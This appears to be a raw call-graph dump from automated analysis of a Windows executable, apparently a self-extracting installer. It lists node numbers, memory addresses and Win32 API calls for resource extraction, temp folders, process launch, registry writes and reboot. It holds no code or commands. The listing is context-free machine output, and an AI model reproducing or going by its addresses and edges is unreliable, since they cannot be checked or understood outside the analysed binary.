AdjustTokenPrivileges CloseHandle 2427->2428 2431 7ff681c21c34 2427->2431 2429 7ff681c21cd4 ExitWindowsEx 2428->2429 2428->2431 2429->2431 2432 7ff681c21c50 2429->2432 2430 7ff681c24f2c 24 API calls 2430->2432 2431->2430 2433 7ff681c286f0 7 API calls 2432->2433 2434 7ff681c21d02 2433->2434 2434->2266 2436 7ff681c22f6b 2435->2436 2437 7ff681c25243 2435->2437 2436->2287 2436->2288 2437->2436 2438 7ff681c2524c FindResourceA LoadResource LockResource 2437->2438 2438->2436 2439 7ff681c2528b memcpy_s FreeResource 2438->2439 2439->2436 2441 7ff681c277de 2440->2441 2465 7ff681c2736a 2440->2465 2442 7ff681c286f0 7 API calls 2441->2442 2444 7ff681c230d9 2442->2444 2443 7ff681c27442 2443->2441 2446 7ff681c2745f GetModuleFileNameA 2443->2446 2444->2288 2444->2306 2445 7ff681c27395 CharNextA 2445->2465 2447 7ff681c27487 2446->2447 2448 7ff681c27494 2446->2448 2532 7ff681c27fb8 2447->2532 2448->2441 2450 7ff681c2794b 2544 7ff681c288c8 RtlCaptureContext RtlLookupFunctionEntry 2450->2544 2453 7ff681c274b0 CharUpperA 2454 7ff681c278e7 2453->2454 2453->2465 2541 7ff681c21bc0 2454->2541 2457 7ff681c278f8 CloseHandle 2458 7ff681c27904 ExitProcess 2457->2458 2459 7ff681c27615 CharUpperA 2459->2465 2460 7ff681c275be CompareStringA 2460->2465 2461 7ff681c27673 CharUpperA 2461->2465 2462 7ff681c27548 CharUpperA 2462->2465 2463 7ff681c2770a CharUpperA 2463->2465 2464 7ff681c27f48 IsDBCSLeadByte CharNextA 2464->2465 2465->2441 2465->2443 2465->2445 2465->2450 2465->2453 2465->2459 2465->2460 2465->2461 2465->2462 2465->2463 2465->2464 2537 7ff681c27e08 2465->2537 2468 7ff681c286f9 2467->2468 2469 7ff681c22dfa 2468->2469 2470 7ff681c28750 RtlCaptureContext RtlLookupFunctionEntry 2468->2470 2469->2266 2469->2328 2471 7ff681c28795 RtlVirtualUnwind 2470->2471 2472 7ff681c287d7 2470->2472 2471->2472 2550 7ff681c28714 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2472->2550 2478 7ff681c2203d 2475->2478 2479 7ff681c22213 2475->2479 2476 7ff681c22204 2477 7ff681c286f0 7 API calls 2476->2477 2477->2479 2478->2476 2480 7ff681c220cd FindFirstFileA 2478->2480 2479->2293 2480->2476 2488 7ff681c220ef 2480->2488 2481 7ff681c22129 lstrcmpA 2483 7ff681c22149 lstrcmpA 2481->2483 2484 7ff681c221ca FindNextFileA 2481->2484 2482 7ff681c22194 2485 7ff681c221a5 SetFileAttributesA DeleteFileA 2482->2485 2483->2484 2483->2488 2486 7ff681c221e6 FindClose RemoveDirectoryA 2484->2486 2484->2488 2485->2484 2486->2476 2487 7ff681c27e08 CharPrevA 2487->2488 2488->2481 2488->2482 2488->2484 2488->2487 2489 7ff681c22034 8 API calls 2488->2489 2489->2488 2495 7ff681c23d91 2490->2495 2497 7ff681c23d8a 2490->2497 2491 7ff681c23ffb 2493 7ff681c286f0 7 API calls 2491->2493 2492 7ff681c24f2c 24 API calls 2492->2491 2494 7ff681c2316a 2493->2494 2494->2293 2505 7ff681c21258 2494->2505 2495->2491 2495->2497 2498 7ff681c23ef5 2495->2498 2551 7ff681c22898 2495->2551 2497->2492 2498->2491 2498->2497 2499 7ff681c23fae MessageBeep 2498->2499 2564 7ff681c28154 2499->2564 2502 7ff681c23fca MessageBoxA 2502->2491 2506 7ff681c212a8 2505->2506 2507 7ff681c21421 2505->2507 2598 7ff681c21130 LoadLibraryA 2506->2598 2509 7ff681c286f0 7 API calls 2507->2509 2511 7ff681c21446 2509->2511 2511->2293 2524 7ff681c27d28 FindResourceA 2511->2524 2512 7ff681c212b9 GetCurrentProcess OpenProcessToken 2512->2507 2513 7ff681c212e3 GetTokenInformation 2512->2513 2514 7ff681c2140c CloseHandle 2513->2514 2515 7ff681c2130c GetLastError 2513->2515 2514->2507 2515->2514 2516 7ff681c21321 LocalAlloc 2515->2516 2516->2514 2517 7ff681c2133e GetTokenInformation 2516->2517 2518 7ff681c21368 AllocateAndInitializeSid 2517->2518 2519 7ff681c213fd LocalFree 2517->2519 2518->2519 2522 7ff681c213b1 2518->2522 2519->2514 2520 7ff681c213ed FreeSid 2520->2519 2521 7ff681c213be EqualSid 2521->2522 2523 7ff681c213e2 2521->2523 2522->2520 2522->2521 2522->2523 2523->2520 2525 7ff681c27dc3 2524->2525 2526 7ff681c27d63 LoadResource 2524->2526 2528 7ff681c24f2c 24 API calls 2525->2528 2526->2525 2527 7ff681c27d7d DialogBoxIndirectParamA FreeResource 2526->2527 2527->2525 2531 7ff681c27de7 2527->2531 2529 7ff681c27de2 2528->2529 2529->2531 2531->2300 2533 7ff681c28029 2532->2533 2534 7ff681c27fd8 2532->2534 2533->2448 2535 7ff681c27fe0 IsDBCSLeadByte 2534->2535 2536 7ff681c28006 CharNextA 2534->2536 2535->2534 2536->2533 2536->2534 2538 7ff681c27e28 2537->2538 2538->2538 2539 7ff681c27e4c CharPrevA 2538->2539 2540 7ff681c27e3a 2538->2540 2539->2540 2540->2465 2542 7ff681c24f2c 24 API calls 2541->2542 2543 7ff681c21be7 2542->2543 2543->2457 2543->2458 2545 7ff681c28947 2544->2545 2546 7ff681c28905 RtlVirtualUnwind 2544->2546 2549 7ff681c28714 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2545->2549 2546->2545 2552 7ff681c22a9a 2551->2552 2562 7ff681c228d5 2551->2562 2554 7ff681c22abf GlobalFree 2552->2554 2558 7ff681c22aaa 2552->2558 2554->2558 2555 7ff681c22908 GetFileVersionInfoSizeA 2556 7ff681c22926 GlobalAlloc 2555->2556 2555->2562 2557 7ff681c22946 GlobalLock 2556->2557 2556->2558 2557->2552 2559 7ff681c22961 GetFileVersionInfoA 2557->2559 2558->2498 2560 7ff681c22985 VerQueryValueA 2559->2560 2559->2562 2561 7ff681c22a59 GlobalUnlock 2560->2561 2560->2562 2561->2562 2562->2552 2562->2555 2562->2561 2563 7ff681c22a3e GlobalUnlock 2562->2563 2579 7ff681c22644 2562->2579 2563->2554 2565 7ff681c28194 GetVersionExA 2564->2565 2573 7ff681c282c6 2564->2573 2568 7ff681c281bd 2565->2568 2565->2573 2566 7ff681c286f0 7 API calls 2567 7ff681c23fc1 2566->2567 2567->2502 2575 7ff681c28084 2567->2575 2569 7ff681c281e0 GetSystemMetrics 2568->2569 2568->2573 2570 7ff681c281f7 RegOpenKeyExA 2569->2570 2569->2573 2571 7ff681c2822c RegQueryValueExA RegCloseKey 2570->2571 2570->2573 2571->2573 2574 7ff681c28276 2571->2574 2572 7ff681c282b5 CharNextA 2572->2574 2573->2566 2574->2572 2574->2573 2576 7ff681c280aa EnumResourceLanguagesA 2575->2576 2577 7ff681c2812d 2575->2577 2576->2577 2578 7ff681c280ef EnumResourceLanguagesA 2576->2578 2577->2502 2578->2577 2580 7ff681c22849 GetSystemDirectoryA 2579->2580 2581 7ff681c22683 CharUpperA CharNextA CharNextA 2579->2581 2582 7ff681c22843 2580->2582 2583 7ff681c2282f GetSystemDirectoryA 2581->2583 2584 7ff681c226c4 2581->2584 2585 7ff681c27e08 CharPrevA 2582->2585 2588 7ff681c2286a 2582->2588 2583->2582 2586 7ff681c22819 GetWindowsDirectoryA 2584->2586 2587 7ff681c226ce 2584->2587 2585->2588 2586->2582 2590 7ff681c27e08 CharPrevA 2587->2590 2589 7ff681c286f0 7 API calls 2588->2589 2591 7ff681c22879 2589->2591 2592 7ff681c2272d RegOpenKeyExA 2590->2592 2591->2562 2592->2582 2593 7ff681c22760 RegQueryValueExA 2592->2593 2594 7ff681c22806 RegCloseKey 2593->2594 2595 7ff681c22793 2593->2595 2594->2582 2596 7ff681c2279c ExpandEnvironmentStringsA 2595->2596 2597 7ff681c227ba 2595->2597 2596->2597 2597->2594 2599 7ff681c21229 2598->2599 2600 7ff681c21185 GetProcAddress 2598->2600 2603 7ff681c286f0 7 API calls 2599->2603 2601 7ff681c2121a FreeLibrary 2600->2601 2602 7ff681c211a3 AllocateAndInitializeSid 2600->2602 2601->2599 2602->2601 2604 7ff681c211ec FreeSid 2602->2604 2605 7ff681c21238 2603->2605 2604->2601 2605->2507 2605->2512 2608 7ff681c251f8 7 API calls 2607->2608 2609 7ff681c262af LocalAlloc 2608->2609 2610 7ff681c262fb 2609->2610 2611 7ff681c262cd 2609->2611 2612 7ff681c251f8 7 API calls 2610->2612 2613 7ff681c24f2c 24 API calls 2611->2613 2615 7ff681c2630d 2612->2615 2614 7ff681c262eb 2613->2614 2829 7ff681c27958 GetLastError 2614->2829 2617 7ff681c2634a lstrcmpA 2615->2617 2618 7ff681c26311 2615->2618 2620 7ff681c2637a 2617->2620 2621 7ff681c26364 LocalFree 2617->2621 2619 7ff681c24f2c 24 API calls 2618->2619 2622 7ff681c2632f LocalFree 2619->2622 2623 7ff681c24f2c 24 API calls 2620->2623 2624 7ff681c2324b 2621->2624 2622->2624 2625 7ff681c2639c LocalFree 2623->2625 2624->2329 2624->2331 2624->2338 2626 7ff681c262f0 2625->2626 2626->2624 2628 7ff681c251f8 7 API calls 2627->2628 2629 7ff681c261f1 2628->2629 2630 7ff681c261f6 2629->2630 2631 7ff681c2623a 2629->2631 2632 7ff681c24f2c 24 API calls 2630->2632 2633 7ff681c251f8 7 API calls 2631->2633 2635 7ff681c26215 2632->2635 2634 7ff681c26253 2633->2634 2636 7ff681c27984 13 API calls 2634->2636 2637 7ff681c2326e 2635->2637 2638 7ff681c2625f 2636->2638 2637->2338 2641 7ff681c268f0 2637->2641 2638->2637 2639 7ff681c26263 2638->2639 2640 7ff681c24f2c 24 API calls 2639->2640 2640->2635 2642 7ff681c251f8 7 API calls 2641->2642 2643 7ff681c26932 LocalAlloc 2642->2643 2644 7ff681c26982 2643->2644 2645 7ff681c26952 2643->2645 2647 7ff681c251f8 7 API calls 2644->2647 2646 7ff681c24f2c 24 API calls 2645->2646 2648 7ff681c26970 2646->2648 2649 7ff681c26994 2647->2649 2854 7ff681c27958 GetLastError 2648->2854 2651 7ff681c26998 2649->2651 2652 7ff681c269d1 lstrcmpA LocalFree 2649->2652 2656 7ff681c24f2c 24 API calls 2651->2656 2653 7ff681c26a18 2652->2653 2654 7ff681c26a63 2652->2654 2662 7ff681c26710 53 API calls 2653->2662 2659 7ff681c26d40 2654->2659 2661 7ff681c26a7b GetTempPathA 2654->2661 2655 7ff681c26975 2658 7ff681c2697b 2655->2658 2657 7ff681c269b6 LocalFree 2656->2657 2657->2658 2663 7ff681c286f0 7 API calls 2658->2663 2660 7ff681c27d28 28 API calls 2659->2660 2660->2658 2664 7ff681c26a9e 2661->2664 2671 7ff681c26ad1 2661->2671 2665 7ff681c26a38 2662->2665 2666 7ff681c2327b 2663->2666 2830 7ff681c26710 2664->2830 2665->2658 2669 7ff681c26a40 2665->2669 2666->2338 2666->2342 2670 7ff681c24f2c 24 API calls 2669->2670 2670->2655 2671->2658 2673 7ff681c26d07 GetWindowsDirectoryA 2671->2673 2674 7ff681c26b25 GetDriveTypeA 2671->2674 2676 7ff681c26f14 38 API calls 2673->2676 2677 7ff681c26b42 GetFileAttributesA 2674->2677 2688 7ff681c26b3d 2674->2688 2676->2671 2677->2688 2678 7ff681c26710 53 API calls 2678->2671 2679 7ff681c26b81 GetDiskFreeSpaceA 2681 7ff681c26baf MulDiv 2679->2681 2679->2688 2680 7ff681c22490 25 API calls 2680->2688 2681->2688 2682 7ff681c26c2e GetWindowsDirectoryA 2682->2688 2683 7ff681c27e08 CharPrevA 2685 7ff681c26c56 GetFileAttributesA 2683->2685 2684 7ff681c26f14 38 API calls 2684->2688 2686 7ff681c26c6c CreateDirectoryA 2685->2686 2685->2688 2686->2688 2687 7ff681c26c99 SetFileAttributesA 2687->2688 2688->2658 2688->2673 2688->2674 2688->2677 2688->2679 2688->2680 2688->2682 2688->2683 2688->2684 2688->2687 2689 7ff681c26710 53 API calls 2688->2689 2689->2688 2691 7ff681c26f5b 2690->2691 2692 7ff681c26f63 GetCurrentDirectoryA SetCurrentDirectoryA 2690->2692 2697 7ff681c286f0 7 API calls 2691->2697 2693 7ff681c26fbb GetDiskFreeSpaceA 2692->2693 2694 7ff681c26f8e 2692->2694 2695 7ff681c271da memset 2693->2695 2696 7ff681c26ffc MulDiv 2693->2696 2698 7ff681c24f2c 24 API calls 2694->2698 2908 7ff681c27958 GetLastError 2695->2908 2696->2695 2699 7ff681c2702a GetVolumeInformationA 2696->2699 2700 7ff681c233a1 2697->2700 2701 7ff681c26fab 2698->2701 2704 7ff681c270c1 SetCurrentDirectoryA 2699->2704 2705 7ff681c27062 memset 2699->2705 2700->2338 2700->2350 2889 7ff681c27958 GetLastError 2701->2889 2703 7ff681c271f2 GetLastError FormatMessageA 2707 7ff681c27234 2703->2707 2713 7ff681c270e9 2704->2713 2890 7ff681c27958 GetLastError 2705->2890 2710 7ff681c24f2c 24 API calls 2707->2710 2709 7ff681c26fb0 2709->2691 2712 7ff681c2724f SetCurrentDirectoryA 2710->2712 2711 7ff681c2707a GetLastError FormatMessageA 2711->2707 2712->2691 2714 7ff681c2712c 2713->2714 2716 7ff681c27150 2713->2716 2715 7ff681c24f2c 24 API calls 2714->2715 2715->2709 2716->2691 2891 7ff681c22520 2716->2891 2719 7ff681c25f9b FindResourceA LoadResource LockResource 2718->2719 2720 7ff681c251f8 7 API calls 2718->2720 2721 7ff681c25fec 2719->2721 2722 7ff681c261bf 2719->2722 2720->2719 2723 7ff681c26046 2721->2723 2724 7ff681c25ff8 GetDlgItem ShowWindow GetDlgItem ShowWindow 2721->2724 2722->2370 2909 7ff681c25e44 #20 2723->2909 2724->2723 2727 7ff681c26059 #20 2728 7ff681c2604f 2727->2728 2729 7ff681c260c1 #22 2727->2729 2730 7ff681c24f2c 24 API calls 2728->2730 2731 7ff681c26145 2729->2731 2732 7ff681c26105 #23 2729->2732 2733 7ff681c26143 2730->2733 2734 7ff681c26151 FreeResource 2731->2734 2735 7ff681c26165 2731->2735 2732->2728 2732->2731 2733->2731 2734->2735 2736 7ff681c2618f 2735->2736 2737 7ff681c26171 2735->2737 2736->2722 2739 7ff681c261a1 SendMessageA 2736->2739 2738 7ff681c24f2c 24 API calls 2737->2738 2738->2736 2739->2722 2741 7ff681c24208 2740->2741 2758 7ff681c2421f 2740->2758 2743 7ff681c251f8 7 API calls 2741->2743 2742 7ff681c24235 memset 2742->2758 2743->2758 2744 7ff681c2434a 2745 7ff681c24f2c 24 API calls 2744->2745 2746 7ff681c24369 2745->2746 2747 7ff681c245e9 2746->2747 2749 7ff681c286f0 7 API calls 2747->2749 2750 7ff681c245fa 2749->2750 2750->2363 2751 7ff681c243eb CompareStringA 2752 7ff681c246d3 2751->2752 2751->2758 2752->2747 2753 7ff681c246ed RegOpenKeyExA 2752->2753 2753->2747 2757 7ff681c24722 RegQueryValueExA 2753->2757 2754 7ff681c24694 2759 7ff681c24f2c 24 API calls 2754->2759 2756 7ff681c251f8 7 API calls 2756->2758 2761 7ff681c24817 RegCloseKey 2757->2761 2762 7ff681c24767 memset GetSystemDirectoryA 2757->2762 2758->2742 2758->2744 2758->2747 2758->2751 2758->2752 2758->2754 2758->2756 2763 7ff681c245a8 LocalFree 2758->2763 2764 7ff681c245da LocalFree 2758->2764 2768 7ff681c242ed CompareStringA 2758->2768 2783 7ff681c2448a 2758->2783 2936 7ff681c215f4 2758->2936 2975 7ff681c21d10 memset memset RegCreateKeyExA 2758->2975 3002 7ff681c24838 2758->3002 2765 7ff681c246b3 LocalFree 2759->2765 2761->2747 2766 7ff681c24798 2762->2766 2767 7ff681c247ae 2762->2767 2763->2752 2763->2758 2764->2747 2765->2747 2770 7ff681c27e08 CharPrevA 2766->2770 2771 7ff681c210bc _vsnprintf 2767->2771 2768->2758 2770->2767 2772 7ff681c247d7 RegSetValueExA 2771->2772 2772->2761 2773 7ff681c2449b GetProcAddress 2775 7ff681c2461c 2773->2775 2773->2783 2774 7ff681c2466f 2776 7ff681c24f2c 24 API calls 2774->2776 2777 7ff681c24f2c 24 API calls 2775->2777 2779 7ff681c24692 2776->2779 2780 7ff681c2463f FreeLibrary 2777->2780 2781 7ff681c2464e LocalFree 2779->2781 2780->2781 3028 7ff681c27958 GetLastError 2781->3028 2783->2773 2783->2774 2784 7ff681c245ce FreeLibrary 2783->2784 2785 7ff681c24580 FreeLibrary 2783->2785 3018 7ff681c27c50 2783->3018 2784->2764 2785->2763 2787 7ff681c251f8 7 API calls 2786->2787 2788 7ff681c2407b LocalAlloc 2787->2788 2789 7ff681c240cd 2788->2789 2790 7ff681c2409d 2788->2790 2791 7ff681c251f8 7 API calls 2789->2791 2792 7ff681c24f2c 24 API calls 2790->2792 2793 7ff681c240df 2791->2793 2794 7ff681c240bb 2792->2794 2795 7ff681c24120 lstrcmpA 2793->2795 2796 7ff681c240e3 2793->2796 3066 7ff681c27958 GetLastError 2794->3066 2799 7ff681c24188 LocalFree 2795->2799 2800 7ff681c2413e 2795->2800 2798 7ff681c24f2c 24 API calls 2796->2798 2801 7ff681c24101 LocalFree 2798->2801 2803 7ff681c23261 2799->2803 2802 7ff681c27d28 28 API calls 2800->2802 2801->2803 2804 7ff681c2415e LocalFree 2802->2804 2803->2329 2803->2338 2804->2803 2805->2365 2807 7ff681c279e2 2806->2807 2808 7ff681c210bc _vsnprintf 2807->2808 2814 7ff681c27a1a FreeResource 2807->2814 2815 7ff681c27a65 FreeResource 2807->2815 2809 7ff681c27a41 FindResourceA 2808->2809 2810 7ff681c279b6 LoadResource LockResource 2809->2810 2811 7ff681c27a63 2809->2811 2810->2807 2810->2811 2812 7ff681c286f0 7 API calls 2811->2812 2813 7ff681c27a90 2812->2813 2813->2353 2814->2807 2815->2811 2817 7ff681c251f8 7 API calls 2816->2817 2818 7ff681c24a6f LocalAlloc 2817->2818 2819 7ff681c24ab1 2818->2819 2820 7ff681c24a91 2818->2820 2822 7ff681c251f8 7 API calls 2819->2822 2821 7ff681c24f2c 24 API calls 2820->2821 2823 7ff681c24aaf 2821->2823 2824 7ff681c24ac3 2822->2824 2823->2338 2825 7ff681c24ac7 2824->2825 2826 7ff681c24add lstrcmpA 2824->2826 2828 7ff681c24f2c 24 API calls 2825->2828 2826->2825 2827 7ff681c24b16 LocalFree 2826->2827 2827->2823 2828->2827 2829->2626 2831 7ff681c26809 2830->2831 2832 7ff681c26742 2830->2832 2872 7ff681c26d9c 2831->2872 2861 7ff681c265a8 2832->2861 2836 7ff681c286f0 7 API calls 2840 7ff681c268d2 2836->2840 2838 7ff681c267f8 2846 7ff681c27e08 CharPrevA 2838->2846 2839 7ff681c267a3 GetSystemInfo 2849 7ff681c267bd 2839->2849 2840->2658 2855 7ff681c22490 GetWindowsDirectoryA 2840->2855 2841 7ff681c26856 CreateDirectoryA 2843 7ff681c2686b 2841->2843 2844 7ff681c26894 2841->2844 2842 7ff681c26875 2845 7ff681c26f14 38 API calls 2842->2845 2843->2842 2884 7ff681c27958 GetLastError 2844->2884 2847 7ff681c26882 2845->2847 2846->2831 2851 7ff681c26886 2847->2851 2853 7ff681c268aa RemoveDirectoryA 2847->2853 2849->2838 2850 7ff681c27e08 CharPrevA 2849->2850 2850->2838 2851->2836 2852 7ff681c26899 2852->2851 2853->2851 2854->2655 2856 7ff681c224ec 2855->2856 2857 7ff681c224ce 2855->2857 2859 7ff681c286f0 7 API calls 2856->2859 2858 7ff681c24f2c 24 API calls 2857->2858 2858->2856 2860 7ff681c22507 2859->2860 2860->2671 2860->2678 2863 7ff681c265df 2861->2863 2864 7ff681c27e08 CharPrevA 2863->2864 2868 7ff681c2666f GetTempFileNameA 2863->2868 2885 7ff681c210bc 2863->2885 2865 7ff681c26640 RemoveDirectoryA GetFileAttributesA 2864->2865 2865->2863 2866 7ff681c266df CreateDirectoryA 2865->2866 2867 7ff681c266b4 2866->2867 2866->2868 2870 7ff681c286f0 7 API calls 2867->2870 2868->2867 2869 7ff681c2668f DeleteFileA CreateDirectoryA 2868->2869 2869->2867 2871 7ff681c266c6 2870->2871 2871->2838 2871->2839 2871->2851 2873 7ff681c26db7 2872->2873 2873->2873 2874 7ff681c26dc0 LocalAlloc 2873->2874 2875 7ff681c26de0 2874->2875 2878 7ff681c26e21 2874->2878 2876 7ff681c24f2c 24 API calls 2875->2876 2877 7ff681c26dfe 2876->2877 2882 7ff681c26852 2877->2882 2888 7ff681c27958 GetLastError 2877->2888 2879 7ff681c27e08 CharPrevA 2878->2879 2881 7ff681c26e7f CreateFileA LocalFree 2879->2881 2881->2877 2883 7ff681c26ecb CloseHandle GetFileAttributesA 2881->2883 2882->2841 2882->2842 2883->2877 2884->2852 2886 7ff681c210eb _vsnprintf 2885->2886 2887 7ff681c210dc 2885->2887 2886->2887 2887->2863 2888->2882 2889->2709 2890->2711 2892 7ff681c2258a 2891->2892 2893 7ff681c2254d 2891->2893 2894 7ff681c2258f 2892->2894 2895 7ff681c225d3 2892->2895 2896 7ff681c210bc _vsnprintf 2893->2896 2897 7ff681c210bc _vsnprintf 2894->2897 2900 7ff681c210bc _vsnprintf 2895->2900 2907 7ff681c22585 2895->2907 2898 7ff681c22565 2896->2898 2899 7ff681c225a7 2897->2899 2902 7ff681c24f2c 24 API calls 2898->2902 2904 7ff681c24f2c 24 API calls 2899->2904 2905 7ff681c225ef 2900->2905 2901 7ff681c286f0 7 API calls 2903 7ff681c22631 2901->2903 2902->2907 2903->2691 2904->2907 2906 7ff681c24f2c 24 API calls 2905->2906 2906->2907 2907->2901 2908->2703 2910 7ff681c25ed1 2909->2910 2920 7ff681c25f46 2909->2920 2921 7ff681c255c0 2910->2921 2912 7ff681c286f0 7 API calls 2914 7ff681c25f5c 2912->2914 2914->2727 2914->2728 2915 7ff681c25ef1 #21 2916 7ff681c25f0c 2915->2916 2915->2920 2916->2920 2933 7ff681c259b0 2916->2933 2919 7ff681c25f33 #23 2919->2920 2920->2912 2922 7ff681c255f3 2921->2922 2923 7ff681c2563d lstrcmpA 2922->2923 2924 7ff681c25610 2922->2924 2926 7ff681c25634 2923->2926 2927 7ff681c25694 2923->2927 2925 7ff681c24f2c 24 API calls 2924->2925 2925->2926 2926->2915 2926->2920 2927->2926 2928 7ff681c256e8 CreateFileA 2927->2928 2928->2926 2931 7ff681c2571e 2928->2931 2929 7ff681c257a1 CreateFileA 2929->2926 2930 7ff681c25789 CharNextA 2930->2931 2931->2926 2931->2929 2931->2930 2932 7ff681c25772 CreateDirectoryA 2931->2932 2932->2930 2934 7ff681c259cf 2933->2934 2935 7ff681c259e4 CloseHandle 2933->2935 2934->2919 2934->2920 2935->2934 2937 7ff681c21649 2936->2937 3029 7ff681c21558 2937->3029 2940 7ff681c27e08 CharPrevA 2942 7ff681c216dc 2940->2942 2941 7ff681c27fb8 2 API calls 2943 7ff681c2177f 2941->2943 2942->2941 2944 7ff681c21788 CompareStringA 2943->2944 2945 7ff681c219d3 2943->2945 2944->2945 2947 7ff681c217bb GetFileAttributesA 2944->2947 2946 7ff681c27fb8 2 API calls 2945->2946 2948 7ff681c219e0 2946->2948 2949 7ff681c219ab 2947->2949 2950 7ff681c217d5 2947->2950 2951 7ff681c219e9 CompareStringA 2948->2951 2952 7ff681c21a83 LocalAlloc 2948->2952 2955 7ff681c24f2c 24 API calls 2949->2955 2950->2949 2953 7ff681c21558 2 API calls 2950->2953 2951->2952 2961 7ff681c21a18 2951->2961 2952->2949 2954 7ff681c21aa3 GetFileAttributesA 2952->2954 2956 7ff681c217f9 2953->2956 2959 7ff681c21ab9 2954->2959 2974 7ff681c218c5 2955->2974 2958 7ff681c21823 LocalAlloc 2956->2958 2962 7ff681c21558 2 API calls 2956->2962 2957 7ff681c21b82 2960 7ff681c286f0 7 API calls 2957->2960 2958->2949 2963 7ff681c21847 GetPrivateProfileIntA GetPrivateProfileStringA 2958->2963 2972 7ff681c21b0c 2959->2972 2964 7ff681c21b9e 2960->2964 2961->2961 2965 7ff681c21a39 LocalAlloc 2961->2965 2962->2958 2966 7ff681c21940 2963->2966 2963->2974 2964->2758 2965->2949 2970 7ff681c21a6a 2965->2970 2968 7ff681c21951 GetShortPathNameA 2966->2968 2969 7ff681c21973 2966->2969 2968->2969 2973 7ff681c210bc _vsnprintf 2969->2973 2971 7ff681c210bc _vsnprintf 2970->2971 2971->2974 3037 7ff681c22ae8 2972->3037 2973->2974 2974->2957 2976 7ff681c21db6 2975->2976 2977 7ff681c21fff 2975->2977 2979 7ff681c210bc _vsnprintf 2976->2979 2983 7ff681c21e0d 2976->2983 2978 7ff681c286f0 7 API calls 2977->2978 2980 7ff681c2200e 2978->2980 2981 7ff681c21dd6 RegQueryValueExA 2979->2981 2980->2758 2981->2976 2982 7ff681c21e2c GetSystemDirectoryA 2981->2982 2984 7ff681c27e08 CharPrevA 2982->2984 2983->2982 2985 7ff681c21e0f RegCloseKey 2983->2985 2986 7ff681c21e50 LoadLibraryA 2984->2986 2985->2977 2987 7ff681c21f3b GetModuleFileNameA 2986->2987 2988 7ff681c21e6c GetProcAddress FreeLibrary 2986->2988 2989 7ff681c21f5e RegCloseKey 2987->2989 2993 7ff681c21ece 2987->2993 2988->2987 2990 7ff681c21ea4 GetSystemDirectoryA 2988->2990 2989->2977 2991 7ff681c21ebb 2990->2991 2990->2993 2992 7ff681c27e08 CharPrevA 2991->2992 2992->2993 2993->2993 2994 7ff681c21ef7 LocalAlloc 2993->2994 2995 7ff681c21f1b 2994->2995 2996 7ff681c21f74 2994->2996 2997 7ff681c24f2c 24 API calls 2995->2997 2998 7ff681c210bc _vsnprintf 2996->2998 2999 7ff681c21f39 2997->2999 3000 7ff681c21faa 2998->3000 2999->2989 3000->3000 3001 7ff681c21fb3 RegSetValueExA RegCloseKey LocalFree 3000->3001 3001->2977 3003 7ff681c24874 CreateProcessA 3002->3003 3004 7ff681c2486d 3002->3004 3005 7ff681c249bb 3003->3005 3006 7ff681c248ca WaitForSingleObject GetExitCodeProcess 3003->3006 3007 7ff681c286f0 7 API calls 3004->3007 3065 7ff681c27958 GetLastError 3005->3065 3008 7ff681c24901 3006->3008 3010 7ff681c24a37 3007->3010 3014 7ff681c223c0 19 API calls 3008->3014 3017 7ff681c24932 CloseHandle CloseHandle 3008->3017 3010->2758 3011 7ff681c249c0 GetLastError FormatMessageA 3012 7ff681c24f2c 24 API calls 3011->3012 3012->3004 3016 7ff681c24955 3014->3016 3015 7ff681c249b2 3015->3004 3016->3017 3017->3004 3017->3015 3019 7ff681c27c85 3018->3019 3020 7ff681c27e08 CharPrevA 3019->3020 3021 7ff681c27cc3 GetFileAttributesA 3020->3021 3022 7ff681c27cf6 LoadLibraryA 3021->3022 3023 7ff681c27cd9 3021->3023 3025 7ff681c27d09 3022->3025 3023->3022 3024 7ff681c27cdd LoadLibraryExA 3023->3024 3024->3025 3026 7ff681c286f0 7 API calls 3025->3026 3027 7ff681c27d19 3026->3027 3027->2783 3028->2746 3030 7ff681c21579 3029->3030 3032 7ff681c21591 3030->3032 3033 7ff681c215c1 3030->3033 3051 7ff681c27f48 3030->3051 3034 7ff681c27f48 2 API calls 3032->3034 3033->2940 3033->2942 3035 7ff681c2159f 3034->3035 3035->3033 3036 7ff681c27f48 2 API calls 3035->3036 3036->3035 3038 7ff681c22b1f 3037->3038 3039 7ff681c22d41 3037->3039 3038->3039 3040 7ff681c22b28 GetModuleFileNameA 3038->3040 3041 7ff681c286f0 7 API calls 3039->3041 3040->3039 3048 7ff681c22b50 3040->3048 3042 7ff681c22d54 3041->3042 3042->2957 3043 7ff681c22b54 IsDBCSLeadByte 3043->3048 3044 7ff681c22b79 CharNextA CharUpperA 3047 7ff681c22c6d CharUpperA 3044->3047 3044->3048 3045 7ff681c22d13 CharNextA 3046 7ff681c22d25 CharNextA 3045->3046 3046->3039 3046->3043 3047->3048 3048->3043 3048->3044 3048->3045 3048->3046 3050 7ff681c22bbe CharPrevA 3048->3050 3056 7ff681c27ea0 3048->3056 3050->3048 3052 7ff681c27f60 3051->3052 3053 7ff681c27f99 3052->3053 3054 7ff681c27f6a IsDBCSLeadByte 3052->3054 3055 7ff681c27f82 CharNextA 3052->3055 3053->3030 3054->3052 3054->3053 3055->3052 3057 7ff681c27eb8 3056->3057 3057->3057 3058 7ff681c27ec1 CharPrevA 3057->3058 3059 7ff681c27edd CharPrevA 3058->3059 3060 7ff681c27ed5 3059->3060 3061 7ff681c27ef4 3059->3061 3060->3059 3062 7ff681c27efe CharPrevA 3060->3062 3061->3062 3063 7ff681c27f27 3061->3063 3064 7ff681c27f15 CharNextA 3061->3064 3062->3063 3062->3064 3063->3048 3064->3063 3065->3011 3066->2803 3068 7ff681c22349 RegQueryInfoKeyA RegCloseKey 3067->3068 3069 7ff681c223ad 3067->3069 3068->3069 3069->2394 3071 7ff681c222db 3070->3071 3072 7ff681c22271 3070->3072 3073 7ff681c286f0 7 API calls 3071->3073 3074 7ff681c27e08 CharPrevA 3072->3074 3075 7ff681c222ed 3073->3075 3076 7ff681c22284 WritePrivateProfileStringA _lopen 3074->3076 3075->2394 3076->3071 3077 7ff681c222b7 _llseek _lclose 3076->3077 3077->3071 3298 7ff681c2351e 3299 7ff681c2361c 3298->3299 3300 7ff681c23532 3298->3300 3302 7ff681c23615 3299->3302 3303 7ff681c23625 SendDlgItemMessageA 3299->3303 3301 7ff681c2353f 3300->3301 3304 7ff681c23571 GetDesktopWindow 3300->3304 3301->3302 3305 7ff681c23560 EndDialog 3301->3305 3303->3302 3306 7ff681c24dc8 14 API calls 3304->3306 3305->3302 3307 7ff681c23588 6 API calls 3306->3307 3307->3302 3308 7ff681c25a1e 